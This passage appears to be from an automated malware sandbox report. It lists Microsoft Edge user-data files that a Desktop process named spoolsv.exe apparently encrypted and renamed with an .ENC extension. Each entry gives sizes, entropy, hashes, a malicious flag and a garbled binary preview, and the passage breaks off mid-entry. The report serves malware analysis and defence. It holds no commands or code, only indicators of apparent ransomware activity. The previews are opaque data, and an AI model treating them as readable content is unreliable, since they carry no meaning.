                                                                                                                                                                                                                                                      SSDEEP:3:UqYF6FsYABxmnSRf:S6FsYABxmnU
                                                                                                                                                                                                                                                      MD5:73156769AC7AA03983EF145553243608
                                                                                                                                                                                                                                                      SHA1:2FB6BC01A2B5406B5CA320CE475FDB817E44EE2D
                                                                                                                                                                                                                                                      SHA-256:70AF7115B32D059D43A85F92AED8701EB93BA12B52E3746702F1D7F2A9D26BB1
                                                                                                                                                                                                                                                      SHA-512:92366FB5F01BD0473A4B4181F7165B186389E03E5449A5ECDADBA7646CF3278BF6D4A8217BCFA094C5119FC5CCBDEE0F86133602395C1882E3DACCE0BA97E539
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.....p.....Ii..3.F.Z..mB.X.h^.6.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-0.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3584
                                                                                                                                                                                                                                                      Entropy (8bit):7.948256348221182
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:hK2o+HvozegIqtjShSZkLBzWSPlxS0CzETrS6:/HgISj0YkB3PlxSTOS6
                                                                                                                                                                                                                                                      MD5:CC2B39950FAAA5853AD271E69E3C788F
                                                                                                                                                                                                                                                      SHA1:7000759A6437A2FE2AE256C36975AD2B236C1DD2
                                                                                                                                                                                                                                                      SHA-256:B73A35760DCC6B763C21D0550DA3640F743222FF978193B3EDFAAA6EEB8CEC2B
                                                                                                                                                                                                                                                      SHA-512:EBF8244118B5B3BBE69998CB2C139762DD851040254979330C3D60CC8205A2315C9D1F3862C50C3C68AF343E9EEA13C43CFC31E40F7B37B476839FDD84EDFB8B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:!4....0.bZ.u$..q..#....(..?...Z..J:..+m.....)w[....E.s.....&)V).C.....(..0........_..=.9.S.N#.Q.V2.J....Y..=LP:..=.._..)$Y|....[...k.G..m.~.....8YZ.....2z}.&.hr.s0X..0u:0)....lmM&)_......hlB......`)P.pUU+..B.+...N.2.(...L0..0.Wo.0"...#...D.q.Zq.....A.}D.`,..K...U..f.{.Ih...u.T..J..W.qp.B0A.%.0..O.i.G.U....R........}.........2.;..G..P.J.y..Ndh\.!..xAZD.Q]..P.=gv.}..5.Iy.C.l}A.y]..,kI.t^..._Z....pK..L+....'Y....!..PdH.|.3X.......*....O.%......u...YI0.._.........r......./..!(a.i...\zs.....C.....z.".K..n.:...y..g.[.{Y^...N{...<..F.....J......cC _#A.Q(...r.y...Ot!B...!...?j..#2.z....MhS.K*......`Lv.{l..8z&.5...ww$x.t..a.4.V.Ba+7..5rN(].GRM.F,9....H..:.;.L.|...o....[.9....-.A:.@fT.0......-qW.?..D.t.e..|...<v..|.0..i!.*.oE.v.o.....6.T.......)..u68P[...3...^.$P.T....^..C(3......$^.d..0y...7.....9..$pe...F.s....../..:...#.:..P.jI\.jV..]...<..X....8T5.0.FmB.G8..9Fe.~......f.C..p..A..2q.li&V.....2Yu.I...-.89.Fj4.tQ.......x]...x..&.]..\rih.`Oaqh...E

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):48
                                                                                                                                                                                                                                                      Entropy (8bit):5.4599625007211605
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:FsxBOGrJbdIsAOspQ:6xBOGrJ1p
                                                                                                                                                                                                                                                      MD5:07A3445B699B130DEACFFA013294AE21
                                                                                                                                                                                                                                                      SHA1:F62165F4196A5E48FC0E4DE4613AC588162943C3
                                                                                                                                                                                                                                                      SHA-256:E12BAAB2128CAE03A1E285A82D10E8FD873372EF6FEDEA103CFA94093AF7A1FF
                                                                                                                                                                                                                                                      SHA-512:E3A6218E04457D6AEF8889DF697D116EBFFBAE4CB8C081D7C935EEC3F2F064E95924B2B98F8348F256A7182AD81E5534D410D0714EBF15070A4C124033116538
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..p[.Y...tiR4..*@.......x...H....Z.....{....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Speech Recognition\1.15.0.1\manifest.json.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):80
                                                                                                                                                                                                                                                      Entropy (8bit):6.053055907333271
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Plp7Fb+YolgkBH2AqdL:NZh+hMAqJ
                                                                                                                                                                                                                                                      MD5:9638B68588841BCF2E7D5FC50654959A
                                                                                                                                                                                                                                                      SHA1:D89431E5A4C32422EA31F3DC328DA3E951C94835
                                                                                                                                                                                                                                                      SHA-256:B7A1FF4A1745401D9298EC8838B740ED76CA3907B38DF43751BED4598157E6A6
                                                                                                                                                                                                                                                      SHA-512:A7E6C5C9C10CA6FD88DC9C25EC94509D84D5069A08F196057B2976C92FFFBF6164FDA516F4946AE76A437A325165788393BBA431297E1A7729CCA730527BA2E9
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..3c.m.>W.`~.P.7..F.=LP=.ZY..R.9id...Cl.5..B:Z......M.t.Wx.=....;L...L'!..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\TrustTokenKeyCommitments\2023.9.4.1\LICENSE.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1568
                                                                                                                                                                                                                                                      Entropy (8bit):7.859142165246519
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:jNWN+Ys0VNT7rLLAGAMGZ3tz/6bqieOpW:ENDNT3LNAMG+FeN
                                                                                                                                                                                                                                                      MD5:B6533BC5795162B8D8D67D83FE644512
                                                                                                                                                                                                                                                      SHA1:6C4D8F8D69887A114971FBAA5478B4DD5CB07630
                                                                                                                                                                                                                                                      SHA-256:B1085FE180CAFC1F479FC23805D00CC9FBEB22D9433FD56556EA6F69F8FB3B7B
                                                                                                                                                                                                                                                      SHA-512:B18331FB29248D469AF7E5400C721F50E4EB86911129CC373711EAE6AA198B2059402762964B40EDD2F9437E630CA3A3B0C3464435133B1793127E419F8C980A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:e...nR.G...@R.V.x.B&..W.>tO.....PeX^`..}b..y.vVAq..c.i.}.8n.^..s!I.s3..<...m:...(z..:U.}..+.\.a}.."....v.!........{3.]....4*(Ja.U..Aq....Q..8.[...4e..#].L+a&.*o.#.z.B9A..b..&..^.h...~......RU..I..+....... ./a..a..N.z..NM.ui.:.j'j.4Md.....h..n..%ac.ck.L.+..0.-kW....{k.q.... d.2z ...c.]...VA2...[....3..[..B.!...0B.*.(....2....#"..u>)mmI....S.$R{.:.Z...Y.FB.....|........#.@....i........W.qw8.}u...i}u.........W.q......%....2.*..s`,.D.ra.O&..+.7V.....,......T.6..$....^|>..!.).~..W.b...R.(,..{j.n.q.Q.k..2.t.e.'.i..^t..[.L._#G5..E.n8..Vp]Q..2]w..SV.f..G...A.].A...#....4....$...oZ.eA.M..<...J.m+.z.]....3...l.Bc..rE....W..l....[X|.Z..2...S..sA|<..ZX...;..)..\..Z.R.Cm....m..1...5..zb..!...M....!V..V...F.o.F':....H-A..n.T.<........pr...A.N...d..I#b..%..[.s..i:..."\.$HX...,..|&.".d....o.A.......L.J...5.K.Q......h....0.ROr...O0..G.cv.$&......^....^E...x.~.....s@.iH........IG!W..}7^.7n.(u.D....8`%DC....).ySc.N.......q.Q..)..F:.S......hJ7..H/I.......#.W....q...#

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Typosquatting\1.20231004.1.0\manifest.json.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):128
                                                                                                                                                                                                                                                      Entropy (8bit):6.560432324168044
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:HtKWGCJZMbwznM4qCeto/1av5GriWliPHCR16w5dc1n:HJZMUMset+aI/aiTLO1n
                                                                                                                                                                                                                                                      MD5:AC1D64DB824999251FC9443636FE7239
                                                                                                                                                                                                                                                      SHA1:190B114A25143613EED98FCE90956DDCF9748334
                                                                                                                                                                                                                                                      SHA-256:500A25BE9459F3AE2A4E9B47B0D07C41DBA1105F69EB31B811FB89FDD95EB202
                                                                                                                                                                                                                                                      SHA-512:07B6DB8ED0EDF964F44CAFDC5E4988F8ED1583EDFB90819D15A79F1F93440D1A4E8C5115918B94FC97A920AAC71A6ACF363D494453DB28F64633C12EFD5A4353
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.._C..D..eZ......g.....^.i{..bB(.O.H.g.B...U.0.\....H".;;. .*..>H...f.E...]...?&..=.<..an.L..\.],..j.M..^b....8.. q.9.......

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):96
                                                                                                                                                                                                                                                      Entropy (8bit):6.311372266278552
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:YBRBU/3bADWs1xvcfenrN2tv9HjzRRVvZX5Sme7kB:YBY/b0Ws1xZQtv9HjzRRVRX5p
                                                                                                                                                                                                                                                      MD5:B5CDC9E3EC339140CC34FA33A05C6FEF
                                                                                                                                                                                                                                                      SHA1:8BD23ABD06F4E56FCECE803490582002FE17EE1F
                                                                                                                                                                                                                                                      SHA-256:2798331D4F65B768908CB249699AFC3393BD5FA4C2F87B8EE325D2E589FA0ED7
                                                                                                                                                                                                                                                      SHA-512:3E747289619DD6A3499BB1FBB8C1A5DB860EDD7C6AC018D132B44798B04B88BEE36A0A447D3088B4756262BB07D3E0297708FBAD50B91A29761BF204BE693A80
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...gj._..K..l..R.......'.i..TI.U...y&b]..{...JN.|..a....C...;G.f.Sax...tGe.)L.5..H.?....A..d

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-as.hyb.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):704
                                                                                                                                                                                                                                                      Entropy (8bit):7.740587867489532
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:tdwz+58LrxynEPVJ8X1wWKIcq9QXjjS8JCetw0MoCb5/NovW8b:7WLtynEtJ8SXj+8JCjloCbBNyWQ
                                                                                                                                                                                                                                                      MD5:193C86528B1A9EAE8CE6625327BB8343
                                                                                                                                                                                                                                                      SHA1:96E69CDA6FC780B54D292A03B4DABECF3D1072CF
                                                                                                                                                                                                                                                      SHA-256:D584714E2A69A3359F8EDFB41E06E68F0BE3A3316AB5EC908598917696D36EFE
                                                                                                                                                                                                                                                      SHA-512:113AA867418009B48CF4551EC063A8913AFD665BFA41F7376D7DEA269B87744BE55513259642589A963E5F08D5CABB599FD9A3968BAC00E151478CB2E628F44D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.!.U-d...b.C.....m+.."x.f...L..A....._Z.Q.7.mL...../..w...6.U..G[...V.u.a.a.;.*...ImGs.(....`.c. .<..O.....@.dYfw..........9.0.xr......G..W....\3.~....p..D.H{C....%c<._........9.......S.k..(.D...KH......5N.#_)....>P}>$23].7{.$...L.....&..Y....-.H....rY._&...9V....q...NC.. ...(..C.-.Z.S.1w..x..n....*&u..C~...yF4u/.D..#..L....{...U.oL...n..~o.a..^a.M.:..&.l&..v.`...r.!.RC.....m. k.w[JDk..K&..B8..!..2.9F([x.R0.`..W$...M.).hM[.7O..>wtDC^^....y&H#a.B._G......zD)y...w@.).>o...-kZ..lu....'.{.!;.Q.8U6....[T......v#....qU._.....8....@..K..GG.zM....g].K.0.w/....q...zh...?.A.. ..>|.t|...*...y-|')...0f.d{<..dM..iqKD..f@..'...@.>.5:^.v.7...8m%........[......[...R.....j.)..5`.s

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-be.hyb.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):6112
                                                                                                                                                                                                                                                      Entropy (8bit):7.967796423182605
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:uWGjDjOwzqvSc3oAy+j3m3OivkceN5htT7u55TTQnGZnUHSqR/WWVtFhCN0wjAv+:uXDjOoq73oA7m3BczT7uLTKGZnSSA/Wd
                                                                                                                                                                                                                                                      MD5:62AF6CFE2F76F7213548014BEB11BCB0
                                                                                                                                                                                                                                                      SHA1:35AB3C44D3A9A4316FF6BD485D703AF69BDEBFD4
                                                                                                                                                                                                                                                      SHA-256:F0E92CAD6E0BEB81B006658837BEBD94B9F2810F03898DF7E1BC833912675910
                                                                                                                                                                                                                                                      SHA-512:DB8CE95E4D80FE9AC9A04D29E1F57810425C77D2261CA5D40AA80E6B747FD3CC7FEF6DAAA56515FDF9C9F5C9231D0AC563CC2FD5FFCA0A96E363044639C9087E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...8.$....}pt....HD{qgc....LJRRY..H..L<j....j0.Bi.[...m..t...O.v!..qJ.M.....?m85.q_..8.r....k$.......Z...h.yf@.@.2.[ ..;......O. ... ...0.......2...........U....~efY/.zU.......O.V...j...y .}.x.a1..]`....,".e*.66....<.V.....ti.....D.;..sC`.........~....H.. ..-..|.Y.*..xl.....o...........w#A]...rh..V.5|.:.|.m..~0V...U`./...M..F.c2.f...g.O...].=.7D..x...R"'9...Kq..qv.Q..S..J}..eo..."f......4..R ..?.U....F6..F....(...0...^E......{..y...8...4.]);...hf... #k.<...GhxFh....GrY..d.......h...V..d^...U]...~{..j..18.l...m..{L....Q.N.r.5.*u..9.d.. 6...(!.......h..F/.[.ww..1....:=.Qa*.U]...-.7.G!rwT.b.T....@.e.....z...Y$....~.~.y.e..H...D# ..R...P"..D.\..,...DPQ.$..`g. B.w.K..tL;.l.Y...e.)...&..........=..Ul......6T.j.\.R..k..6=|.$......O...%.....N."....0R..Z].}....K4.f>S%8&.M...4r.....g,..0.n".*..W..!h..P."........S.d....f9..F+.......)."...3:....fj.w....j.|.f.P?.d.].p7@.Z..(+.....&A.....v.......O".G.7...O."uA^...rxg...q.!...hW.fD...'.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-bg.hyb.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3472
                                                                                                                                                                                                                                                      Entropy (8bit):7.949905985234842
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:os5ufpSzJ8SvvTyOG/FrObAFSqNjBi60S+M1rs:ufpSzJ8SvGOcqbAPVBLz6
                                                                                                                                                                                                                                                      MD5:72AA7AF5B1F505C3D5AEC0B9FBEC9324
                                                                                                                                                                                                                                                      SHA1:CE129219E8951858A53639648835074748211D14
                                                                                                                                                                                                                                                      SHA-256:D4DB06BE0688B581E24DBE878898D42D1685FFCF2ECE4107E2B40461CA095BA4
                                                                                                                                                                                                                                                      SHA-512:5301B97222CAEF710E80DB9D1C71FA1F43DB5125FB1D32B56EDC9A02F02C1D90EF5EAA68207EB5DB25A7DB0B1C5A37ABE7BEBE763DB774173D31A03DBEF14ADC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:*...{.6X.E..s%k.M.=x.-.0..V..q.."8.Fs./.R.S.=.I}...Gb.oT..!..".o.C.[..J)HWtJ.;....SU..Q.T. ...|......U.A>D.~..N].1.rc.E....fvM).yn.H....[....p}4.......^..}b..6CN.j.=E..?........qR..$'U"l.O...o..^.E.8.....l..'o......f...w..9.zt.....Z}.h.Ub.M....I....[`s...^.L0.............xi.R.`..BP.m..... P...8E.^wA..0..1lY@.^e..:wB...".xU.`.}.G..>..o..J... ).?..Z..R..!4d.`...8..j^...).h.{.....2..p4l...N..?.=;.E."<i......r.p..8......._D...j..t...k....D......-.g...H.y..e.Z.............>...y...,s.C.}...x.{.O..L.u...?..Ih.=.&.Vi8bZS.+.R..8.9O..:...$..f...v...{Px.$....7../S.,..J.=..nt1..6..3O.|'!. .......g....{p'.no..n]7T.:b.].....yb...F~p.....7U...v...\...;M0./.J.....H..._.y"".&.....,.*H.7..1...D....c..A.Q.5#L.9.s.v....G...c.....5_#..[..U.....,...|....R.ML6...WW.+...'s.......i.z...&.....?EEr.n :8..G.pC.>.$.R...3].....}.8.....Y...'.......{...;.'.f.`M..$.~H$.@.U(...V.Bn...~rD....A..c.......4..G..yX..<.B....K...y..|.ra9..J!.7E v)..0......,.d.,....\.l..m..)"...j*.Y4.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-bn.hyb.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):704
                                                                                                                                                                                                                                                      Entropy (8bit):7.740587867489532
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:tdwz+58LrxynEPVJ8X1wWKIcq9QXjjS8JCetw0MoCb5/NovW8b:7WLtynEtJ8SXj+8JCjloCbBNyWQ
                                                                                                                                                                                                                                                      MD5:193C86528B1A9EAE8CE6625327BB8343
                                                                                                                                                                                                                                                      SHA1:96E69CDA6FC780B54D292A03B4DABECF3D1072CF
                                                                                                                                                                                                                                                      SHA-256:D584714E2A69A3359F8EDFB41E06E68F0BE3A3316AB5EC908598917696D36EFE
                                                                                                                                                                                                                                                      SHA-512:113AA867418009B48CF4551EC063A8913AFD665BFA41F7376D7DEA269B87744BE55513259642589A963E5F08D5CABB599FD9A3968BAC00E151478CB2E628F44D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.!.U-d...b.C.....m+.."x.f...L..A....._Z.Q.7.mL...../..w...6.U..G[...V.u.a.a.;.*...ImGs.(....`.c. .<..O.....@.dYfw..........9.0.xr......G..W....\3.~....p..D.H{C....%c<._........9.......S.k..(.D...KH......5N.#_)....>P}>$23].7{.$...L.....&..Y....-.H....rY._&...9V....q...NC.. ...(..C.-.Z.S.1w..x..n....*&u..C~...yF4u/.D..#..L....{...U.oL...n..~o.a..^a.M.:..&.l&..v.`...r.!.RC.....m. k.w[JDk..K&..B8..!..2.9F([x.R0.`..W$...M.).hM[.7O..>wtDC^^....y&H#a.B._G......zD)y...w@.).>o...-kZ..lu....'.{.!;.Q.8U6....[T......v#....qU._.....8....@..K..GG.zM....g].K.0.w/....q...zh...?.A.. ..>|.t|...*...y-|')...0f.d{<..dM..iqKD..f@..'...@.>.5:^.v.7...8m%........[......[...R.....j.)..5`.s

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-cu.hyb.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):52848
                                                                                                                                                                                                                                                      Entropy (8bit):7.996765271843692
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:768:iPtHPAUsdwNC+q8SVbfiVHIwGhuL9C/TN9WDDr6X/NKHjzOdioFJJI:iPVPAUsdmC+qlVbfiVHIzz77WDvnqzC
                                                                                                                                                                                                                                                      MD5:AEEF08CB754BF0A7CED477A1DB8361C4
                                                                                                                                                                                                                                                      SHA1:35FB51AC99C85C180FCEF8CD66C12C2BC978ECCA
                                                                                                                                                                                                                                                      SHA-256:23D514A7DBE839A2A2639F7096803FB99E560239C53D5D0409B7622DFD862CD7
                                                                                                                                                                                                                                                      SHA-512:AD26FEA944885A29CE191A76D95CF072429B24440074C257354415B92E4CD9524D2F79D96C94BAFB818B6A76350ECAF4803D74EBFC4096BC925B2C0AFD1A13E7
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:o.....3w..z.),pb....].k!JCW.4x.Aa|.A&..C..\..8.=cp.+B.P[..^T.p...).('.V.V.;&..m..{..3...$...U7..<..K.Z3.[...KnI.<..Yt~.N=1GHV.....7?|.........;.$....P.+...Qb.....Cg....O..h.....kR..Ym.sw.&....)4!.~T..3]-_.TqN..{.\*dy...m..>.....n...-./.}R.Ms....>.......}>m;\;..Qm.2........1......x.+\}...]..X....}.:...8..=e"..7...._n..v,2.7=@...]..`....m.I.......y`...UO ......<....x[K....6.....%.......*....<i'......-.;.o7.y|.G.C$..%'w}(A..0$E.p}_.+}.g.g.....$.fFAR.......r._..A..P..........S/lH.].I..........6\.M.J.3a{.....=.)..H........ ....q....bQH.'.. <.e.G.H.!...3M..._x..,..-FYk.&...<;....r..._.e.0.>`..@P.u..f.t}q..~2{:.*v].........o..9t./.L7C...9......"%....z..\i.).9.....W..>k[..j.y.4...(.B1R..y..c...N...$xyF.Y..n*`..w...V..DM...TW..<.i.k.z.....)...}~...-...)cp.Y.?..p[..kM1F....$}o..i.`..@.!V".5Z.W..1.5$...0.^*. 3.S8/..=...Xi.cK*Q.l/....c.-..S....f.+......u..2.r..De..|.......rH....?..i.......4R....'......ns...|x.U....`..... .4...#./AG..7.\.5../..;..K

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-cy.hyb.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):35920
                                                                                                                                                                                                                                                      Entropy (8bit):7.99467567175146
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:768:7PLPmtRWWMZ4gj+7PO5qtqRnwEQisCEQvS4U:zzURWzZ4gyL74OEdbqj
                                                                                                                                                                                                                                                      MD5:9E67100DEA3C6BE7771E181016AA806E
                                                                                                                                                                                                                                                      SHA1:1BB327A234CCDA87F464837054B2140C2F178352
                                                                                                                                                                                                                                                      SHA-256:6CB9F92018311713146C4210F39490E95A5D7077B1ED3BD8832A3BE1D59AA8FD
                                                                                                                                                                                                                                                      SHA-512:7C3FB4B0E635135370CA4D3F01550F19C236566B1F0EB337DAD1578B374BD3D7DCD3A034F278AEB047778FB3D6F975BC1D9BC4F48478B65A4C188C0C23B97B2F
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:o..I....lF....L..K..0&X.s<...K.&r..HC<.j.,v...cz.&c2v.IGm......f%...G,M]..E.kwp..L.j..L...`....GD/...5..\N..|j...B.....d..j ......Hq`..g..B...f..].W.fso........bw_..n9.x5o.L.{p@.b'Y..KD..2rE......SV..P}......KR......ht..[...0....iJx.*#r..^....G#1.....)....W.m.[O.;`TTp...Jj.~.G.(l.N.7.#$:.jB>..+..^hyI.94...UP....#....o&......C_.H.m.E....LX..W...../..m...k.hs..m.K.c..AT{.....o.t.....-.....k..d...p.6.]./t.q3 x...-.-.H....A.I.Oy......i.Q..p.%.....].Q|..{..~ffo...Y.H....??^.R.PH...X.....o:.......pe%Df.8.'..^.Z..y.....z.FH...#....9sS3#/..7m./U.l..q..m>bh.kJ.K...om(Uo.... ......O.V..~h.eor:.........ta.]!....d../....v.~cF.-..M....G;T...T3.e..f...+..<5.."......]h9_?fg..X<45..xY*.D.5.i3"_.Z..hR..oV.x.......Pb......az...?..&..T.d..T..9......4.....Mo.r...~....g..l(.K..*....z..{0,dj=..=..8..g.}.V.aJpE+J.dSX.u.~.C.N.<....:............Q....]6....".....R..@..j5.{W.>4.O...@.n<.Z.OKgS.O.....fD.'...dLe..c_0I."....\K...........1......"gh.......4..J...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-da.hyb.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):6976
                                                                                                                                                                                                                                                      Entropy (8bit):7.97666237996144
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:yfc303/YFnow0otKahu6t355WP603r3u4rniWFfUga62q4BwRqzr9WNhFQ6z0Tqx:B30Pcbuq55l03reanggad/u7CqjYW4xK
                                                                                                                                                                                                                                                      MD5:B72F559A08423AB2159C86FEE08E799D
                                                                                                                                                                                                                                                      SHA1:D75AD23487FB4DEE19FD38685E69F24A8D8B36C3
                                                                                                                                                                                                                                                      SHA-256:1FB7E98FE36A4776D3046DFB39299E7F1A239E3F1C73485193E6D539BB6D0956
                                                                                                                                                                                                                                                      SHA-512:741110281B89DEA4ADFF2AB72DD8989BAA0266ADBCDB42CDDC42FF872D49B4CE55EDE82C1CF9767D40BE1B7D93F047FCF8B581FA0B263B26E9482B9FF712FC03
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:o..I....lF....L.i.6y..\.>O;{k.l. ..$...p.z%..P./Sq...WS....X/..D....G}...h{.i..Up.2...<...a.)..U.C.-<./.)'.\..c..t.._....'z.?;...b.Q..aP.F.g...*5..`~.O}S.M..jo.=....z. PS..+.v...#Ix2.~..I.bu.cTi..q..f...xr~HQ.>......wmC..a...o...&.^:.........I.!......p...'\..8...".g.*...?.g.....j.<...NL......R..w.y.e.nAo[....G..0>..(!........;..]...$L..5.....,.`XlT...F.SV.o..v.q.u.=. .Q./bcsh.Wc.B.<.y.l.rV.&&..!v.(..J.@yp....Yw...v^............I..^r.c..{.....9...9..h.by.%..E...-...pM.....D..u..Y,.D...<m...Ye.).e....I..&vgV...."....JAh.).k.:.`I8.A..r..g{h=...{,.I...Z..%...`Q..G.M....E...,.Nz.p.}....LYB.N...+tMGC...*.4`Fq.^3!J.z-..m7..P....ng.hMe8...<..B.....a..u..cYP.*.V...&/J.B.[.~\...j...3.9..*..@5..Ir.zPv-....&\....wP....Rz.2. .....C.?.....+\.\.Q..6.q!...A.^.>..6.>....y...C....)$....,.......:.P..b.).og..F86.Nz/......."...Z.J.......]Z......._..!.M.2_.Vuc...8q......J;z".....O\...=.9`.~.$u'-j....'7#>..D..>h...'..y.y.1...l[@.i^..._....^..s."|...........k...."Y.V....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-de-1901.hyb.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):121408
                                                                                                                                                                                                                                                      Entropy (8bit):7.9986435432294405
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:3072:0Vs7jot6F5H1MjIoOVzfLFtppA2oXVFWu+NAnk3OWh:XotkHGklrnpWzI5X
